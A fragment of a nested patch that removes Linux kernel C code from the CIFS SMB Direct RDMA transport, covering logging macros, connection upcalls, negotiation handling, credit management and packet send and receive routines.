+- * logging level via module parameter smbd_logging_class
+- * e.g. cifs.smbd_logging_class=0xa0 will log all log_rdma_recv() and
+- * log_rdma_event()
+- */
+-#define LOG_OUTGOING			0x1
+-#define LOG_INCOMING			0x2
+-#define LOG_READ			0x4
+-#define LOG_WRITE			0x8
+-#define LOG_RDMA_SEND			0x10
+-#define LOG_RDMA_RECV			0x20
+-#define LOG_KEEP_ALIVE			0x40
+-#define LOG_RDMA_EVENT			0x80
+-#define LOG_RDMA_MR			0x100
+-static unsigned int smbd_logging_class;
+-module_param(smbd_logging_class, uint, 0644);
+-MODULE_PARM_DESC(smbd_logging_class,
+-	"Logging class for SMBD transport 0x0 to 0x100");
+-
+-#define ERR		0x0
+-#define INFO		0x1
+-static unsigned int smbd_logging_level = ERR;
+-module_param(smbd_logging_level, uint, 0644);
+-MODULE_PARM_DESC(smbd_logging_level,
+-	"Logging level for SMBD transport, 0 (default): error, 1: info");
+-
+-#define log_rdma(level, class, fmt, args...)				\
+-do {									\
+-	if (level <= smbd_logging_level || class & smbd_logging_class)	\
+-		cifs_dbg(VFS, "%s:%d " fmt, __func__, __LINE__, ##args);\
+-} while (0)
+-
+-#define log_outgoing(level, fmt, args...) \
+-		log_rdma(level, LOG_OUTGOING, fmt, ##args)
+-#define log_incoming(level, fmt, args...) \
+-		log_rdma(level, LOG_INCOMING, fmt, ##args)
+-#define log_read(level, fmt, args...)	log_rdma(level, LOG_READ, fmt, ##args)
+-#define log_write(level, fmt, args...)	log_rdma(level, LOG_WRITE, fmt, ##args)
+-#define log_rdma_send(level, fmt, args...) \
+-		log_rdma(level, LOG_RDMA_SEND, fmt, ##args)
+-#define log_rdma_recv(level, fmt, args...) \
+-		log_rdma(level, LOG_RDMA_RECV, fmt, ##args)
+-#define log_keep_alive(level, fmt, args...) \
+-		log_rdma(level, LOG_KEEP_ALIVE, fmt, ##args)
+-#define log_rdma_event(level, fmt, args...) \
+-		log_rdma(level, LOG_RDMA_EVENT, fmt, ##args)
+-#define log_rdma_mr(level, fmt, args...) \
+-		log_rdma(level, LOG_RDMA_MR, fmt, ##args)
+-
+-static void smbd_disconnect_rdma_work(struct work_struct *work)
+-{
+-	struct smbd_connection *info =
+-		container_of(work, struct smbd_connection, disconnect_work);
+-
+-	if (info->transport_status == SMBD_CONNECTED) {
+-		info->transport_status = SMBD_DISCONNECTING;
+-		rdma_disconnect(info->id);
+-	}
+-}
+-
+-static void smbd_disconnect_rdma_connection(struct smbd_connection *info)
+-{
+-	queue_work(info->workqueue, &info->disconnect_work);
+-}
+-
+-/* Upcall from RDMA CM */
+-static int smbd_conn_upcall(
+-		struct rdma_cm_id *id, struct rdma_cm_event *event)
+-{
+-	struct smbd_connection *info = id->context;
+-
+-	log_rdma_event(INFO, "event=%d status=%d\n",
+-		event->event, event->status);
+-
+-	switch (event->event) {
+-	case RDMA_CM_EVENT_ADDR_RESOLVED:
+-	case RDMA_CM_EVENT_ROUTE_RESOLVED:
+-		info->ri_rc = 0;
+-		complete(&info->ri_done);
+-		break;
+-
+-	case RDMA_CM_EVENT_ADDR_ERROR:
+-		info->ri_rc = -EHOSTUNREACH;
+-		complete(&info->ri_done);
+-		break;
+-
+-	case RDMA_CM_EVENT_ROUTE_ERROR:
+-		info->ri_rc = -ENETUNREACH;
+-		complete(&info->ri_done);
+-		break;
+-
+-	case RDMA_CM_EVENT_ESTABLISHED:
+-		log_rdma_event(INFO, "connected event=%d\n", event->event);
+-		info->transport_status = SMBD_CONNECTED;
+-		wake_up_interruptible(&info->conn_wait);
+-		break;
+-
+-	case RDMA_CM_EVENT_CONNECT_ERROR:
+-	case RDMA_CM_EVENT_UNREACHABLE:
+-	case RDMA_CM_EVENT_REJECTED:
+-		log_rdma_event(INFO, "connecting failed event=%d\n", event->event);
+-		info->transport_status = SMBD_DISCONNECTED;
+-		wake_up_interruptible(&info->conn_wait);
+-		break;
+-
+-	case RDMA_CM_EVENT_DEVICE_REMOVAL:
+-	case RDMA_CM_EVENT_DISCONNECTED:
+-		/* This happenes when we fail the negotiation */
+-		if (info->transport_status == SMBD_NEGOTIATE_FAILED) {
+-			info->transport_status = SMBD_DISCONNECTED;
+-			wake_up(&info->conn_wait);
+-			break;
+-		}
+-
+-		info->transport_status = SMBD_DISCONNECTED;
+-		wake_up_interruptible(&info->disconn_wait);
+-		wake_up_interruptible(&info->wait_reassembly_queue);
+-		wake_up_interruptible_all(&info->wait_send_queue);
+-		break;
+-
+-	default:
+-		break;
+-	}
+-
+-	return 0;
+-}
+-
+-/* Upcall from RDMA QP */
+-static void
+-smbd_qp_async_error_upcall(struct ib_event *event, void *context)
+-{
+-	struct smbd_connection *info = context;
+-
+-	log_rdma_event(ERR, "%s on device %s info %p\n",
+-		ib_event_msg(event->event), event->device->name, info);
+-
+-	switch (event->event) {
+-	case IB_EVENT_CQ_ERR:
+-	case IB_EVENT_QP_FATAL:
+-		smbd_disconnect_rdma_connection(info);
+-		break;
+-
+-	default:
+-		break;
+-	}
+-}
+-
+-static inline void *smbd_request_payload(struct smbd_request *request)
+-{
+-	return (void *)request->packet;
+-}
+-
+-static inline void *smbd_response_payload(struct smbd_response *response)
+-{
+-	return (void *)response->packet;
+-}
+-
+-/* Called when a RDMA send is done */
+-static void send_done(struct ib_cq *cq, struct ib_wc *wc)
+-{
+-	int i;
+-	struct smbd_request *request =
+-		container_of(wc->wr_cqe, struct smbd_request, cqe);
+-
+-	log_rdma_send(INFO, "smbd_request 0x%p completed wc->status=%d\n",
+-		request, wc->status);
+-
+-	if (wc->status != IB_WC_SUCCESS || wc->opcode != IB_WC_SEND) {
+-		log_rdma_send(ERR, "wc->status=%d wc->opcode=%d\n",
+-			wc->status, wc->opcode);
+-		smbd_disconnect_rdma_connection(request->info);
+-	}
+-
+-	for (i = 0; i < request->num_sge; i++)
+-		ib_dma_unmap_single(request->info->id->device,
+-			request->sge[i].addr,
+-			request->sge[i].length,
+-			DMA_TO_DEVICE);
+-
+-	if (atomic_dec_and_test(&request->info->send_pending))
+-		wake_up(&request->info->wait_send_pending);
+-
+-	wake_up(&request->info->wait_post_send);
+-
+-	mempool_free(request, request->info->request_mempool);
+-}
+-
+-static void dump_smbd_negotiate_resp(struct smbd_negotiate_resp *resp)
+-{
+-	log_rdma_event(INFO, "resp message min_version %u max_version %u negotiated_version %u credits_requested %u credits_granted %u status %u max_readwrite_size %u preferred_send_size %u max_receive_size %u max_fragmented_size %u\n",
+-		       resp->min_version, resp->max_version,
+-		       resp->negotiated_version, resp->credits_requested,
+-		       resp->credits_granted, resp->status,
+-		       resp->max_readwrite_size, resp->preferred_send_size,
+-		       resp->max_receive_size, resp->max_fragmented_size);
+-}
+-
+-/*
+- * Process a negotiation response message, according to [MS-SMBD]3.1.5.7
+- * response, packet_length: the negotiation response message
+- * return value: true if negotiation is a success, false if failed
+- */
+-static bool process_negotiation_response(
+-		struct smbd_response *response, int packet_length)
+-{
+-	struct smbd_connection *info = response->info;
+-	struct smbd_negotiate_resp *packet = smbd_response_payload(response);
+-
+-	if (packet_length < sizeof(struct smbd_negotiate_resp)) {
+-		log_rdma_event(ERR,
+-			"error: packet_length=%d\n", packet_length);
+-		return false;
+-	}
+-
+-	if (le16_to_cpu(packet->negotiated_version) != SMBD_V1) {
+-		log_rdma_event(ERR, "error: negotiated_version=%x\n",
+-			le16_to_cpu(packet->negotiated_version));
+-		return false;
+-	}
+-	info->protocol = le16_to_cpu(packet->negotiated_version);
+-
+-	if (packet->credits_requested == 0) {
+-		log_rdma_event(ERR, "error: credits_requested==0\n");
+-		return false;
+-	}
+-	info->receive_credit_target = le16_to_cpu(packet->credits_requested);
+-
+-	if (packet->credits_granted == 0) {
+-		log_rdma_event(ERR, "error: credits_granted==0\n");
+-		return false;
+-	}
+-	atomic_set(&info->send_credits, le16_to_cpu(packet->credits_granted));
+-
+-	atomic_set(&info->receive_credits, 0);
+-
+-	if (le32_to_cpu(packet->preferred_send_size) > info->max_receive_size) {
+-		log_rdma_event(ERR, "error: preferred_send_size=%d\n",
+-			le32_to_cpu(packet->preferred_send_size));
+-		return false;
+-	}
+-	info->max_receive_size = le32_to_cpu(packet->preferred_send_size);
+-
+-	if (le32_to_cpu(packet->max_receive_size) < SMBD_MIN_RECEIVE_SIZE) {
+-		log_rdma_event(ERR, "error: max_receive_size=%d\n",
+-			le32_to_cpu(packet->max_receive_size));
+-		return false;
+-	}
+-	info->max_send_size = min_t(int, info->max_send_size,
+-					le32_to_cpu(packet->max_receive_size));
+-
+-	if (le32_to_cpu(packet->max_fragmented_size) <
+-			SMBD_MIN_FRAGMENTED_SIZE) {
+-		log_rdma_event(ERR, "error: max_fragmented_size=%d\n",
+-			le32_to_cpu(packet->max_fragmented_size));
+-		return false;
+-	}
+-	info->max_fragmented_send_size =
+-		le32_to_cpu(packet->max_fragmented_size);
+-	info->rdma_readwrite_threshold =
+-		rdma_readwrite_threshold > info->max_fragmented_send_size ?
+-		info->max_fragmented_send_size :
+-		rdma_readwrite_threshold;
+-
+-
+-	info->max_readwrite_size = min_t(u32,
+-			le32_to_cpu(packet->max_readwrite_size),
+-			info->max_frmr_depth * PAGE_SIZE);
+-	info->max_frmr_depth = info->max_readwrite_size / PAGE_SIZE;
+-
+-	return true;
+-}
+-
+-static void smbd_post_send_credits(struct work_struct *work)
+-{
+-	int ret = 0;
+-	int use_receive_queue = 1;
+-	int rc;
+-	struct smbd_response *response;
+-	struct smbd_connection *info =
+-		container_of(work, struct smbd_connection,
+-			post_send_credits_work);
+-
+-	if (info->transport_status != SMBD_CONNECTED) {
+-		wake_up(&info->wait_receive_queues);
+-		return;
+-	}
+-
+-	if (info->receive_credit_target >
+-		atomic_read(&info->receive_credits)) {
+-		while (true) {
+-			if (use_receive_queue)
+-				response = get_receive_buffer(info);
+-			else
+-				response = get_empty_queue_buffer(info);
+-			if (!response) {
+-				/* now switch to emtpy packet queue */
+-				if (use_receive_queue) {
+-					use_receive_queue = 0;
+-					continue;
+-				} else
+-					break;
+-			}
+-
+-			response->type = SMBD_TRANSFER_DATA;
+-			response->first_segment = false;
+-			rc = smbd_post_recv(info, response);
+-			if (rc) {
+-				log_rdma_recv(ERR,
+-					"post_recv failed rc=%d\n", rc);
+-				put_receive_buffer(info, response);
+-				break;
+-			}
+-
+-			ret++;
+-		}
+-	}
+-
+-	spin_lock(&info->lock_new_credits_offered);
+-	info->new_credits_offered += ret;
+-	spin_unlock(&info->lock_new_credits_offered);
+-
+-	/* Promptly send an immediate packet as defined in [MS-SMBD] 3.1.1.1 */
+-	info->send_immediate = true;
+-	if (atomic_read(&info->receive_credits) <
+-		info->receive_credit_target - 1) {
+-		if (info->keep_alive_requested == KEEP_ALIVE_PENDING ||
+-		    info->send_immediate) {
+-			log_keep_alive(INFO, "send an empty message\n");
+-			smbd_post_send_empty(info);
+-		}
+-	}
+-}
+-
+-/* Called from softirq, when recv is done */
+-static void recv_done(struct ib_cq *cq, struct ib_wc *wc)
+-{
+-	struct smbd_data_transfer *data_transfer;
+-	struct smbd_response *response =
+-		container_of(wc->wr_cqe, struct smbd_response, cqe);
+-	struct smbd_connection *info = response->info;
+-	int data_length = 0;
+-
+-	log_rdma_recv(INFO, "response=0x%p type=%d wc status=%d wc opcode %d byte_len=%d pkey_index=%u\n",
+-		      response, response->type, wc->status, wc->opcode,
+-		      wc->byte_len, wc->pkey_index);
+-
+-	if (wc->status != IB_WC_SUCCESS || wc->opcode != IB_WC_RECV) {
+-		log_rdma_recv(INFO, "wc->status=%d opcode=%d\n",
+-			wc->status, wc->opcode);
+-		smbd_disconnect_rdma_connection(info);
+-		goto error;
+-	}
+-
+-	ib_dma_sync_single_for_cpu(
+-		wc->qp->device,
+-		response->sge.addr,
+-		response->sge.length,
+-		DMA_FROM_DEVICE);
+-
+-	switch (response->type) {
+-	/* SMBD negotiation response */
+-	case SMBD_NEGOTIATE_RESP:
+-		dump_smbd_negotiate_resp(smbd_response_payload(response));
+-		info->full_packet_received = true;
+-		info->negotiate_done =
+-			process_negotiation_response(response, wc->byte_len);
+-		complete(&info->negotiate_completion);
+-		break;
+-
+-	/* SMBD data transfer packet */
+-	case SMBD_TRANSFER_DATA:
+-		data_transfer = smbd_response_payload(response);
+-		data_length = le32_to_cpu(data_transfer->data_length);
+-
+-		/*
+-		 * If this is a packet with data playload place the data in
+-		 * reassembly queue and wake up the reading thread
+-		 */
+-		if (data_length) {
+-			if (info->full_packet_received)
+-				response->first_segment = true;
+-
+-			if (le32_to_cpu(data_transfer->remaining_data_length))
+-				info->full_packet_received = false;
+-			else
+-				info->full_packet_received = true;
+-
+-			enqueue_reassembly(
+-				info,
+-				response,
+-				data_length);
+-		} else
+-			put_empty_packet(info, response);
+-
+-		if (data_length)
+-			wake_up_interruptible(&info->wait_reassembly_queue);
+-
+-		atomic_dec(&info->receive_credits);
+-		info->receive_credit_target =
+-			le16_to_cpu(data_transfer->credits_requested);
+-		if (le16_to_cpu(data_transfer->credits_granted)) {
+-			atomic_add(le16_to_cpu(data_transfer->credits_granted),
+-				&info->send_credits);
+-			/*
+-			 * We have new send credits granted from remote peer
+-			 * If any sender is waiting for credits, unblock it
+-			 */
+-			wake_up_interruptible(&info->wait_send_queue);
+-		}
+-
+-		log_incoming(INFO, "data flags %d data_offset %d data_length %d remaining_data_length %d\n",
+-			     le16_to_cpu(data_transfer->flags),
+-			     le32_to_cpu(data_transfer->data_offset),
+-			     le32_to_cpu(data_transfer->data_length),
+-			     le32_to_cpu(data_transfer->remaining_data_length));
+-
+-		/* Send a KEEP_ALIVE response right away if requested */
+-		info->keep_alive_requested = KEEP_ALIVE_NONE;
+-		if (le16_to_cpu(data_transfer->flags) &
+-				SMB_DIRECT_RESPONSE_REQUESTED) {
+-			info->keep_alive_requested = KEEP_ALIVE_PENDING;
+-		}
+-
+-		return;
+-
+-	default:
+-		log_rdma_recv(ERR,
+-			"unexpected response type=%d\n", response->type);
+-	}
+-
+-error:
+-	put_receive_buffer(info, response);
+-}
+-
+-static struct rdma_cm_id *smbd_create_id(
+-		struct smbd_connection *info,
+-		struct sockaddr *dstaddr, int port)
+-{
+-	struct rdma_cm_id *id;
+-	int rc;
+-	__be16 *sport;
+-
+-	id = rdma_create_id(&init_net, smbd_conn_upcall, info,
+-		RDMA_PS_TCP, IB_QPT_RC);
+-	if (IS_ERR(id)) {
+-		rc = PTR_ERR(id);
+-		log_rdma_event(ERR, "rdma_create_id() failed %i\n", rc);
+-		return id;
+-	}
+-
+-	if (dstaddr->sa_family == AF_INET6)
+-		sport = &((struct sockaddr_in6 *)dstaddr)->sin6_port;
+-	else
+-		sport = &((struct sockaddr_in *)dstaddr)->sin_port;
+-
+-	*sport = htons(port);
+-
+-	init_completion(&info->ri_done);
+-	info->ri_rc = -ETIMEDOUT;
+-
+-	rc = rdma_resolve_addr(id, NULL, (struct sockaddr *)dstaddr,
+-		RDMA_RESOLVE_TIMEOUT);
+-	if (rc) {
+-		log_rdma_event(ERR, "rdma_resolve_addr() failed %i\n", rc);
+-		goto out;
+-	}
+-	rc = wait_for_completion_interruptible_timeout(
+-		&info->ri_done, msecs_to_jiffies(RDMA_RESOLVE_TIMEOUT));
+-	/* e.g. if interrupted returns -ERESTARTSYS */
+-	if (rc < 0) {
+-		log_rdma_event(ERR, "rdma_resolve_addr timeout rc: %i\n", rc);
+-		goto out;
+-	}
+-	rc = info->ri_rc;
+-	if (rc) {
+-		log_rdma_event(ERR, "rdma_resolve_addr() completed %i\n", rc);
+-		goto out;
+-	}
+-
+-	info->ri_rc = -ETIMEDOUT;
+-	rc = rdma_resolve_route(id, RDMA_RESOLVE_TIMEOUT);
+-	if (rc) {
+-		log_rdma_event(ERR, "rdma_resolve_route() failed %i\n", rc);
+-		goto out;
+-	}
+-	rc = wait_for_completion_interruptible_timeout(
+-		&info->ri_done, msecs_to_jiffies(RDMA_RESOLVE_TIMEOUT));
+-	/* e.g. if interrupted returns -ERESTARTSYS */
+-	if (rc < 0)  {
+-		log_rdma_event(ERR, "rdma_resolve_addr timeout rc: %i\n", rc);
+-		goto out;
+-	}
+-	rc = info->ri_rc;
+-	if (rc) {
+-		log_rdma_event(ERR, "rdma_resolve_route() completed %i\n", rc);
+-		goto out;
+-	}
+-
+-	return id;
+-
+-out:
+-	rdma_destroy_id(id);
+-	return ERR_PTR(rc);
+-}
+-
+-/*
+- * Test if FRWR (Fast Registration Work Requests) is supported on the device
+- * This implementation requries FRWR on RDMA read/write
+- * return value: true if it is supported
+- */
+-static bool frwr_is_supported(struct ib_device_attr *attrs)
+-{
+-	if (!(attrs->device_cap_flags & IB_DEVICE_MEM_MGT_EXTENSIONS))
+-		return false;
+-	if (attrs->max_fast_reg_page_list_len == 0)
+-		return false;
+-	return true;
+-}
+-
+-static int smbd_ia_open(
+-		struct smbd_connection *info,
+-		struct sockaddr *dstaddr, int port)
+-{
+-	int rc;
+-
+-	info->id = smbd_create_id(info, dstaddr, port);
+-	if (IS_ERR(info->id)) {
+-		rc = PTR_ERR(info->id);
+-		goto out1;
+-	}
+-
+-	if (!frwr_is_supported(&info->id->device->attrs)) {
+-		log_rdma_event(ERR, "Fast Registration Work Requests (FRWR) is not supported\n");
+-		log_rdma_event(ERR, "Device capability flags = %llx max_fast_reg_page_list_len = %u\n",
+-			       info->id->device->attrs.device_cap_flags,
+-			       info->id->device->attrs.max_fast_reg_page_list_len);
+-		rc = -EPROTONOSUPPORT;
+-		goto out2;
+-	}
+-	info->max_frmr_depth = min_t(int,
+-		smbd_max_frmr_depth,
+-		info->id->device->attrs.max_fast_reg_page_list_len);
+-	info->mr_type = IB_MR_TYPE_MEM_REG;
+-	if (info->id->device->attrs.kernel_cap_flags & IBK_SG_GAPS_REG)
+-		info->mr_type = IB_MR_TYPE_SG_GAPS;
+-
+-	info->pd = ib_alloc_pd(info->id->device, 0);
+-	if (IS_ERR(info->pd)) {
+-		rc = PTR_ERR(info->pd);
+-		log_rdma_event(ERR, "ib_alloc_pd() returned %d\n", rc);
+-		goto out2;
+-	}
+-
+-	return 0;
+-
+-out2:
+-	rdma_destroy_id(info->id);
+-	info->id = NULL;
+-
+-out1:
+-	return rc;
+-}
+-
+-/*
+- * Send a negotiation request message to the peer
+- * The negotiation procedure is in [MS-SMBD] 3.1.5.2 and 3.1.5.3
+- * After negotiation, the transport is connected and ready for
+- * carrying upper layer SMB payload
+- */
+-static int smbd_post_send_negotiate_req(struct smbd_connection *info)
+-{
+-	struct ib_send_wr send_wr;
+-	int rc = -ENOMEM;
+-	struct smbd_request *request;
+-	struct smbd_negotiate_req *packet;
+-
+-	request = mempool_alloc(info->request_mempool, GFP_KERNEL);
+-	if (!request)
+-		return rc;
+-
+-	request->info = info;
+-
+-	packet = smbd_request_payload(request);
+-	packet->min_version = cpu_to_le16(SMBD_V1);
+-	packet->max_version = cpu_to_le16(SMBD_V1);
+-	packet->reserved = 0;
+-	packet->credits_requested = cpu_to_le16(info->send_credit_target);
+-	packet->preferred_send_size = cpu_to_le32(info->max_send_size);
+-	packet->max_receive_size = cpu_to_le32(info->max_receive_size);
+-	packet->max_fragmented_size =
+-		cpu_to_le32(info->max_fragmented_recv_size);
+-
+-	request->num_sge = 1;
+-	request->sge[0].addr = ib_dma_map_single(
+-				info->id->device, (void *)packet,
+-				sizeof(*packet), DMA_TO_DEVICE);
+-	if (ib_dma_mapping_error(info->id->device, request->sge[0].addr)) {
+-		rc = -EIO;
+-		goto dma_mapping_failed;
+-	}
+-
+-	request->sge[0].length = sizeof(*packet);
+-	request->sge[0].lkey = info->pd->local_dma_lkey;
+-
+-	ib_dma_sync_single_for_device(
+-		info->id->device, request->sge[0].addr,
+-		request->sge[0].length, DMA_TO_DEVICE);
+-
+-	request->cqe.done = send_done;
+-
+-	send_wr.next = NULL;
+-	send_wr.wr_cqe = &request->cqe;
+-	send_wr.sg_list = request->sge;
+-	send_wr.num_sge = request->num_sge;
+-	send_wr.opcode = IB_WR_SEND;
+-	send_wr.send_flags = IB_SEND_SIGNALED;
+-
+-	log_rdma_send(INFO, "sge addr=0x%llx length=%u lkey=0x%x\n",
+-		request->sge[0].addr,
+-		request->sge[0].length, request->sge[0].lkey);
+-
+-	atomic_inc(&info->send_pending);
+-	rc = ib_post_send(info->id->qp, &send_wr, NULL);
+-	if (!rc)
+-		return 0;
+-
+-	/* if we reach here, post send failed */
+-	log_rdma_send(ERR, "ib_post_send failed rc=%d\n", rc);
+-	atomic_dec(&info->send_pending);
+-	ib_dma_unmap_single(info->id->device, request->sge[0].addr,
+-		request->sge[0].length, DMA_TO_DEVICE);
+-
+-	smbd_disconnect_rdma_connection(info);
+-
+-dma_mapping_failed:
+-	mempool_free(request, info->request_mempool);
+-	return rc;
+-}
+-
+-/*
+- * Extend the credits to remote peer
+- * This implements [MS-SMBD] 3.1.5.9
+- * The idea is that we should extend credits to remote peer as quickly as
+- * it's allowed, to maintain data flow. We allocate as much receive
+- * buffer as possible, and extend the receive credits to remote peer
+- * return value: the new credtis being granted.
+- */
+-static int manage_credits_prior_sending(struct smbd_connection *info)
+-{
+-	int new_credits;
+-
+-	spin_lock(&info->lock_new_credits_offered);
+-	new_credits = info->new_credits_offered;
+-	info->new_credits_offered = 0;
+-	spin_unlock(&info->lock_new_credits_offered);
+-
+-	return new_credits;
+-}
+-
+-/*
+- * Check if we need to send a KEEP_ALIVE message
+- * The idle connection timer triggers a KEEP_ALIVE message when expires
+- * SMB_DIRECT_RESPONSE_REQUESTED is set in the message flag to have peer send
+- * back a response.
+- * return value:
+- * 1 if SMB_DIRECT_RESPONSE_REQUESTED needs to be set
+- * 0: otherwise
+- */
+-static int manage_keep_alive_before_sending(struct smbd_connection *info)
+-{
+-	if (info->keep_alive_requested == KEEP_ALIVE_PENDING) {
+-		info->keep_alive_requested = KEEP_ALIVE_SENT;
+-		return 1;
+-	}
+-	return 0;
+-}
+-
+-/* Post the send request */
+-static int smbd_post_send(struct smbd_connection *info,
+-		struct smbd_request *request)
+-{
+-	struct ib_send_wr send_wr;
+-	int rc, i;
+-
+-	for (i = 0; i < request->num_sge; i++) {
+-		log_rdma_send(INFO,
+-			"rdma_request sge[%d] addr=0x%llx length=%u\n",
+-			i, request->sge[i].addr, request->sge[i].length);
+-		ib_dma_sync_single_for_device(
+-			info->id->device,
+-			request->sge[i].addr,
+-			request->sge[i].length,
+-			DMA_TO_DEVICE);
+-	}
+-
+-	request->cqe.done = send_done;
+-
+-	send_wr.next = NULL;
+-	send_wr.wr_cqe = &request->cqe;
+-	send_wr.sg_list = request->sge;
+-	send_wr.num_sge = request->num_sge;
+-	send_wr.opcode = IB_WR_SEND;
+-	send_wr.send_flags = IB_SEND_SIGNALED;
+-
+-	rc = ib_post_send(info->id->qp, &send_wr, NULL);
+-	if (rc) {
+-		log_rdma_send(ERR, "ib_post_send failed rc=%d\n", rc);
+-		smbd_disconnect_rdma_connection(info);
+-		rc = -EAGAIN;
+-	} else
+-		/* Reset timer for idle connection after packet is sent */
+-		mod_delayed_work(info->workqueue, &info->idle_timer_work,
+-			info->keep_alive_interval*HZ);
+-
+-	return rc;
+-}
+-
+-static int smbd_post_send_sgl(struct smbd_connection *info,
+-	struct scatterlist *sgl, int data_length, int remaining_data_length)
+-{
+-	int num_sgs;
+-	int i, rc;
+-	int header_length;
+-	struct smbd_request *request;
+-	struct smbd_data_transfer *packet;
+-	int new_credits;
+-	struct scatterlist *sg;
+-
+-wait_credit:
+-	/* Wait for send credits. A SMBD packet needs one credit */
+-	rc = wait_event_interruptible(info->wait_send_queue,
+-		atomic_read(&info->send_credits) > 0 ||
+-		info->transport_status != SMBD_CONNECTED);
+-	if (rc)
+-		goto err_wait_credit;
+-
+-	if (info->transport_status != SMBD_CONNECTED) {
+-		log_outgoing(ERR, "disconnected not sending on wait_credit\n");
+-		rc = -EAGAIN;
+-		goto err_wait_credit;
+-	}
+-	if (unlikely(atomic_dec_return(&info->send_credits) < 0)) {
+-		atomic_inc(&info->send_credits);
+-		goto wait_credit;
+-	}
+-
+-wait_send_queue:
+-	wait_event(info->wait_post_send,
+-		atomic_read(&info->send_pending) < info->send_credit_target ||
+-		info->transport_status != SMBD_CONNECTED);
+-
+-	if (info->transport_status != SMBD_CONNECTED) {
+-		log_outgoing(ERR, "disconnected not sending on wait_send_queue\n");
+-		rc = -EAGAIN;
+-		goto err_wait_send_queue;
+-	}
+-
+-	if (unlikely(atomic_inc_return(&info->send_pending) >
+-				info->send_credit_target)) {
+-		atomic_dec(&info->send_pending);
+-		goto wait_send_queue;
+-	}
+-
+-	request = mempool_alloc(info->request_mempool, GFP_KERNEL);
+-	if (!request) {
+-		rc = -ENOMEM;
+-		goto err_alloc;
+-	}
+-
+-	request->info = info;
+-
+-	/* Fill in the packet header */
+-	packet = smbd_request_payload(request);
+-	packet->credits_requested = cpu_to_le16(info->send_credit_target);
+-
+-	new_credits = manage_credits_prior_sending(info);
+-	atomic_add(new_credits, &info->receive_credits);
+-	packet->credits_granted = cpu_to_le16(new_credits);
+-
+-	info->send_immediate = false;
+-
+-	packet->flags = 0;
+-	if (manage_keep_alive_before_sending(info))
+-		packet->flags |= cpu_to_le16(SMB_DIRECT_RESPONSE_REQUESTED);
+-
+-	packet->reserved = 0;
+-	if (!data_length)
+-		packet->data_offset = 0;
+-	else
+-		packet->data_offset = cpu_to_le32(24);
+-	packet->data_length = cpu_to_le32(data_length);
+-	packet->remaining_data_length = cpu_to_le32(remaining_data_length);
+-	packet->padding = 0;
+-
+-	log_outgoing(INFO, "credits_requested=%d credits_granted=%d data_offset=%d data_length=%d remaining_data_length=%d\n",
+-		     le16_to_cpu(packet->credits_requested),
+-		     le16_to_cpu(packet->credits_granted),
+-		     le32_to_cpu(packet->data_offset),
+-		     le32_to_cpu(packet->data_length),
+-		     le32_to_cpu(packet->remaining_data_length));
+-
+-	/* Map the packet to DMA */
+-	header_length = sizeof(struct smbd_data_transfer);
+-	/* If this is a packet without payload, don't send padding */
+-	if (!data_length)
+-		header_length = offsetof(struct smbd_data_transfer, padding);
+-
+-	request->num_sge = 1;
+-	request->sge[0].addr = ib_dma_map_single(info->id->device,
+-						 (void *)packet,
+-						 header_length,
+-						 DMA_TO_DEVICE);
+-	if (ib_dma_mapping_error(info->id->device, request->sge[0].addr)) {
+-		rc = -EIO;
+-		request->sge[0].addr = 0;
+-		goto err_dma;
+-	}
+-
+-	request->sge[0].length = header_length;
+-	request->sge[0].lkey = info->pd->local_dma_lkey;
+-
+-	/* Fill in the packet data payload */
+-	num_sgs = sgl ? sg_nents(sgl) : 0;
+-	for_each_sg(sgl, sg, num_sgs, i) {
+-		request->sge[i+1].addr =
+-			ib_dma_map_page(info->id->device, sg_page(sg),
+-			       sg->offset, sg->length, DMA_TO_DEVICE);
+-		if (ib_dma_mapping_error(
+-				info->id->device, request->sge[i+1].addr)) {
+-			rc = -EIO;
+-			request->sge[i+1].addr = 0;
+-			goto err_dma;
+-		}
+-		request->sge[i+1].length = sg->length;
+-		request->sge[i+1].lkey = info->pd->local_dma_lkey;
+-		request->num_sge++;
+-	}
+-
+-	rc = smbd_post_send(info, request);
+-	if (!rc)
+-		return 0;
+-
+-err_dma:
+-	for (i = 0; i < request->num_sge; i++)
+-		if (request->sge[i].addr)
+-			ib_dma_unmap_single(info->id->device,
+-					    request->sge[i].addr,
+-					    request->sge[i].length,
+-					    DMA_TO_DEVICE);
+-	mempool_free(request, info->request_mempool);
+-
+-	/* roll back receive credits and credits to be offered */
+-	spin_lock(&info->lock_new_credits_offered);
+-	info->new_credits_offered += new_credits;
+-	spin_unlock(&info->lock_new_credits_offered);
+-	atomic_sub(new_credits, &info->receive_credits);
+-
+-err_alloc:
+-	if (atomic_dec_and_test(&info->send_pending))
+-		wake_up(&info->wait_send_pending);
+-
+-err_wait_send_queue:
+-	/* roll back send credits and pending */
+-	atomic_inc(&info->send_credits);
+-
+-err_wait_credit:
+-	return rc;
+-}
+-
+-/*
+- * Send a page
+- * page: the page to send
+- * offset: offset in the page to send
+- * size: length in the page to send
+- * remaining_data_length: remaining data to send in this payload
+- */
+-static int smbd_post_send_page(struct smbd_connection *info, struct page *page,
+-		unsigned long offset, size_t size, int remaining_data_length)
+-{
+-	struct scatterlist sgl;
+-
+-	sg_init_table(&sgl, 1);
+-	sg_set_page(&sgl, page, size, offset);
+-
+-	return smbd_post_send_sgl(info, &sgl, size, remaining_data_length);
+-}
+-
+-/*
+- * Send an empty message
+- * Empty message is used to extend credits to peer to for keep live
+- * while there is no upper layer payload to send at the time
+- */
+-static int smbd_post_send_empty(struct smbd_connection *info)
+-{
+-	info->count_send_empty++;
+-	return smbd_post_send_sgl(info, NULL, 0, 0);
+-}
+-
+-/*
+- * Send a data buffer
+- * iov: the iov array describing the data buffers
+- * n_vec: number of iov array
+- * remaining_data_length: remaining data to send following this packet
+- * in segmented SMBD packet
+- */
+-static int smbd_post_send_data(
+-	struct smbd_connection *info, struct kvec *iov, int n_vec,
+-	int remaining_data_length)
+-{
+-	int i;
+-	u32 data_length = 0;
+-	struct scatterlist sgl[SMBDIRECT_MAX_SEND_SGE - 1];
+-
+-	if (n_vec > SMBDIRECT_MAX_SEND_SGE - 1) {
+-		cifs_dbg(VFS, "Can't fit data to SGL, n_vec=%d\n", n_vec);
+-		return -EINVAL;
+-	}
+-
+-	sg_init_table(sgl, n_vec);
+-	for (i = 0; i < n_vec; i++) {
+-		data_length += iov[i].iov_len;
+-		sg_set_buf(&sgl[i], iov[i].iov_base, iov[i].iov_len);
+-	}
+-
+-	return smbd_post_send_sgl(info, sgl, data_length, remaining_data_length);
+-}
+-
+-/*
+- * Post a receive request to the transport
+- * The remote peer can only send data when a receive request is posted
+- * The interaction is controlled by send/receive credit system
+- */
